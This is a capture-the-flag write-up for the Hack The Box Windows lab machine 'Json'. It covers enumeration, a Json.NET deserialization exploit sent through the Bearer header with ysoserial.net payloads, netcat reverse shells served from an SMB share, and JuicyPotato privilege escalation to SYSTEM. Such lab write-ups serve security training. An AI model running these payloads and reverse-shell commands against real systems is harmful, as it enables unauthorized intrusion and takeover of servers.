--- search: exclude: true --- # Json Writeup ![](img/47.png) ## Introduction : Json is a Medium windows box released back in September 2019. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.8/23 ] [ /dev/pts/3 ] [~/_HTB/Json] → sudo nmap -vvv -sTU -p- 10.10.10.158 --max-retries 0 -Pn --min-rate=1000 | grep Discovered Discovered open port 137/udp on 10.10.10.158 Discovered open port 139/tcp on 10.10.10.158 Discovered open port 21/tcp on 10.10.10.158 Discovered open port 445/tcp on 10.10.10.158 Discovered open port 80/tcp on 10.10.10.158 Discovered open port 49154/tcp on 10.10.10.158 [ 10.10.14.8/23 ] [ /dev/pts/3 ] [~/_HTB/Json] → sudo nmap -sTU -p 137,139,21,445,80,49154 -sCV Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-01 23:59 BST WARNING: No targets were specified, so 0 hosts scanned. Nmap done: 0 IP addresses (0 hosts up) scanned in 0.94 seconds [ 10.10.14.8/23 ] [ /dev/pts/3 ] [~/_HTB/Json] → sudo nmap -sTU -p 137,139,21,445,80,49154 -sCV 10.10.10.158 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 00:00 BST Nmap scan report for 10.10.10.158 Host is up (0.15s latency). PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd | ftp-syst: |_ SYST: UNIX emulated by FileZilla 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: Json HTB 137/tcp closed netbios-ns 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 49154/tcp open msrpc Microsoft Windows RPC 21/udp closed ftp 80/udp closed http 137/udp open netbios-ns Microsoft Windows netbios-ns (workgroup: WORKGROUP) 139/udp closed netbios-ssn 445/udp closed microsoft-ds 49154/udp closed unknown Service Info: Host: JSON; OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 4h00m49s, deviation: 0s, median: 4h00m49s |_nbstat: NetBIOS name: JSON, NetBIOS user: , NetBIOS MAC: 00:50:56:b9:c1:28 (VMware) |_smb-os-discovery: ERROR: Script execution failed (use -d to debug) | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-05-02T03:01:59 |_ start_date: 2020-05-02T02:06:16 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 83.50 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80 so upon investigating it we first get a webpage that loads very slowly which also tries to redirect us to another page. The webpage takes forever to load because it is full of dead links which obviously ends up 404ing after a certain timeout: ![](prg/47_001.png) Preety much everything on this page is unusuable and broken, so we take a look at the sourcecode to find the login page url: ![](prg/47_002.png) So we'll use burpsuite to examine the login request: ![](prg/47_003.png) Intercept the request with foxyproxy (127.0.0.1:8080) and burpsuite's intercepter, and then send it to the repeater (CTRL+R) and go there (CTRL+SHIFT+R) And sadly sending the login request gives us a 404 status code. Hopefully for us this machine has got some predictable credentials: ![](prg/47_005.png) And we get a base64 encoded OAuth cookie, so let's decode it: [ 192.168.0.32/24 ] [ /dev/pts/3 ] [~/_HTB/Json] → echo 'eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=' | base64 -d {"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"} And we seem to get credentials, most importantly a password that looks like a hash, but still that's just a cookie, so we'll leave it as it is. So we forward the request to login as admin, to get preety much the same page as before with just as many dead links. The only difference being, when we examine the network side of the webpage (F12, network, asc status codes) we see an interesting url which is /api/Account ![](prg/47_006.png) From here we are heavily hinted towards a json application running on .NET, if we inspect this /api/Account URL further, causing an error onto the **Bearer** header, we are able to get hinted towards a de-serialization attack vector for the initial foothold. The trick here was to mess around with the Bearer parameter of the request being sent for /api/Account which normally contains the OAuth Cookie parameter: ![](prg/47_007.png) ![](prg/47_008.png) Once we start messing with the Bearer HTTP Header, we get the specific error "Cannot deserialize Json.Net Object" which heavily hints us towards a Json .NET deserialization exploit. And in particular towards [ysoserial.net](https://github.com/pwntester/ysoserial.net) Now in order to continue here we need to head over to a windows host to make use of the ysoserial.net binary: ![](prg/47_013.png) ![](prg/47_016.png) Double click it, and send it to the repeater with **CTRL+R** , and go there with **CTRL+SHIFT+R** ![](prg/47_018.png) Once here we modify the Bearer parameter with a payload and we want to test if the machine can ping our host: PS C:\Users\Administrator\Desktop\Github\ysoserial> .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o raw -c "ping 10.10.14.11" { '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35', 'MethodName':'Start', 'MethodParameters':{ '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089', '$values':['cmd', '/c ping 10.10.14.11'] }, 'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'} } Now our Bearer header is in base64, so we use the base64 format: PS C:\Users\Administrator\Desktop\Github\ysoserial> .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "ping 10.10.14.11" ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIHBpbmcgMTAuMTAuMTQuMTEnXQ0KICAgIH0sDQogICAgJ09iamVjdEluc3RhbmNlJzp7JyR0eXBlJzonU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODknfQ0KfQ== And we use tcpdump to check the incoming ICMP packets on our tun0 interface: [ 10.10.14.11/23 ] [ /dev/pts/4 ] [~/HTB/json] → sudo tcpdump -i tun0 icmp [sudo] password for nothing: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes So we inject the Bearer header with our base64 deserialisation payload, and click Send, which causes an error: ![](prg/47_019.png) But most importantly, it shows you that we have been able to do remote code execution: [ 10.10.14.11/23 ] [ /dev/pts/4 ] [~/HTB/json] → sudo tcpdump -i tun0 icmp [sudo] password for nothing: tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes 08:41:58.395646 IP 10.10.10.158 > nowhere: ICMP echo request, id 1, seq 1, length 40 08:41:58.395676 IP nowhere > 10.10.10.158: ICMP echo reply, id 1, seq 1, length 40 08:41:59.398638 IP 10.10.10.158 > nowhere: ICMP echo request, id 1, seq 2, length 40 08:41:59.398662 IP nowhere > 10.10.10.158: ICMP echo reply, id 1, seq 2, length 40 08:42:00.414385 IP 10.10.10.158 > nowhere: ICMP echo request, id 1, seq 3, length 40 08:42:00.414408 IP nowhere > 10.10.10.158: ICMP echo reply, id 1, seq 3, length 40 08:42:01.429977 IP 10.10.10.158 > nowhere: ICMP echo request, id 1, seq 4, length 40 08:42:01.430001 IP nowhere > 10.10.10.158: ICMP echo reply, id 1, seq 4, length 40 So from here we can simply change the payload to a reverse shell payload, we will do so with the netcat binary: [ 10.10.14.11/23 ] [ /dev/pts/17 ] [~/HTB/json] → tree . . ├── binaries **├── nihilist │   ├── nc.exe │   └── xc.exe** ├── nihilist.ps1 ├── nc64.exe ├── xc └── ysoserialpayload 2 directories, 6 files [ 10.10.14.11/23 ] [ /dev/pts/17 ] [~/HTB/json] → sudo **impacket-smbserver nihilist nihilist -smb2support** [sudo] password for nothing: Impacket v0.9.23.dev1+20210519.170900.2f5c2476 - Copyright 2020 SecureAuth Corporation [*] Config file parsed [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [*] Config file parsed [*] Config file parsed [*] Config file parsed So here we created a smb share that the box will access to directly execute the xc.exe binary without the need to download it. PS C:\Users\Administrator\Desktop\Github\ysoserial> .\ysoserial.exe -f Json.Net -g ObjectDataProvider -o base64 -c "\\10.10.14.11\nihilist\nc.exe 10.10.14.11 9001 -e cmd.exe" ew0KICAgICckdHlwZSc6J1N5c3RlbS5XaW5kb3dzLkRhdGEuT2JqZWN0RGF0YVByb3ZpZGVyLCBQcmVzZW50YXRpb25GcmFtZXdvcmssIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1JywgDQogICAgJ01ldGhvZE5hbWUnOidTdGFydCcsDQogICAgJ01ldGhvZFBhcmFtZXRlcnMnOnsNCiAgICAgICAgJyR0eXBlJzonU3lzdGVtLkNvbGxlY3Rpb25zLkFycmF5TGlzdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5JywNCiAgICAgICAgJyR2YWx1ZXMnOlsnY21kJywgJy9jIFxcXFwxMC4xMC4xNC4xMVxcZWNoMFxcbmMuZXhlIDEwLjEwLjE0LjExIDkwMDEgLWUgY21kLmV4ZSddDQogICAgfSwNCiAgICAnT2JqZWN0SW5zdGFuY2UnOnsnJHR5cGUnOidTeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcywgU3lzdGVtLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OSd9DQp9 Then inject the Bearer header with our b64 payload and hit send: ![](prg/47_020.png) And from here we recieve the reverse shell connection back to our port 9001: [ 10.10.14.11/23 ] [ /dev/pts/15 ] [~/HTB/json] → nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.158] 49545 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>whoami whoami json\userpool [...] c:\Users\userpool\Desktop>type user.txt type user.txt 34XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get a shell as userpool, and we got the user flag. ## **Part 3 : Getting Root Access** Now for some reason we can't use powershell because it takes forever to load: [ 10.10.14.11/23 ] [ /dev/pts/15 ] [~/HTB/json] → nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.158] 49592 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv>powershell powershell Windows PowerShell Copyright (C) 2014 Microsoft Corporation. All rights reserved. whoami ^C [ 10.10.14.11/23 ] [ /dev/pts/15 ] [~/HTB/json] → nc -lvnp 9001 So spawn the reverse shell again, and we see that we can print the system infos: c:\windows\system32\inetsrv>systeminfo systeminfo Host Name: JSON **OS Name: Microsoft Windows Server 2012 R2 Datacenter** OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-80005-00001-AA602 Original Install Date: 5/22/2019, 4:27:16 PM System Boot Time: 6/20/2021, 8:54:58 AM System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: x64-based PC Processor(s): 1 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-05:00) Eastern Time (US & Canada) Total Physical Memory: 6,143 MB Available Physical Memory: 5,476 MB Virtual Memory: Max Size: 7,167 MB Virtual Memory: Available: 6,472 MB Virtual Memory: In Use: 695 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es) [01]: 10.10.10.158 [02]: fe80::2dce:4a3f:8489:1791 [03]: dead:beef::2dce:4a3f:8489:1791 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed. Here we get a big hint that we can use [juicypotato]() because this is a Windows Server 2012 machine. You can see [here](https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_Server_2012_Datacenter) that this is a supported version of windows, and we can attempt to run it with one of the CSLIDs specified on that page. [ 10.10.14.11/23 ] [ /dev/pts/18 ] [~/HTB/json] → wget https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe -O nihilist/jp.exe I place it inside the nihilist directory that is being used for my smb server, then simply copy it onto the box: cd ../../../../ c:\>mkdir Temp mkdir Temp c:\>cd Temp cd Temp c:\Temp>copy \\10.10.14.11\nihilist\jp.exe jp.exe copy \\10.10.14.11\nihilist\jp.exe jp.exe 1 file(s) copied. Now we get the netcat binary onto the box, and we create a .bat file that will execute it: c:\Temp>copy \\10.10.14.11\nihilist\nc.exe nc.exe copy \\10.10.14.11\nihilist\nc.exe nc.exe 1 file(s) copied. c:\Temp>echo c:\Temp\nc.exe 10.10.14.11 9002 -e cmd.exe > privesc.bat echo c:\Temp\nc.exe 10.10.14.11 9002 -e cmd.exe > privesc.bat c:\Temp>type privesc.bat type privesc.bat c:\Temp\nc.exe 10.10.14.11 9002 -e cmd.exe Then we use juicypotato accordingly with the corresponding CSLID: ![](prg/47_021.png) c:\Temp> .\jp.exe -l 1337 -p c:\Temp\privesc.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} .\jp.exe -l 1337 -p c:\Temp\privesc.bat -t * -c {e60687f7-01a1-40aa-86ac-db1cbf673334} Testing {e60687f7-01a1-40aa-86ac-db1cbf673334} 1337 .... [+] authresult 0 {e60687f7-01a1-40aa-86ac-db1cbf673334};NT AUTHORITY\SYSTEM [+] CreateProcessWithTokenW OK And we get a reverse shell on our port 9002: [ 10.10.14.11/23 ] [ /dev/pts/18 ] [~/HTB/json] → nc -lvnp 9002 listening on [any] 9002 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.158] 49705 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\Administrator>whoami whoami nt authority\system C:\Users\Administrator>cd .. cd .. C:\Users>cd superadmin cd superadmin C:\Users\superadmin>cd Desktop cd Desktop C:\Users\superadmin\Desktop>type root.txt type root.txt 3cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to print the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/47_graph.png)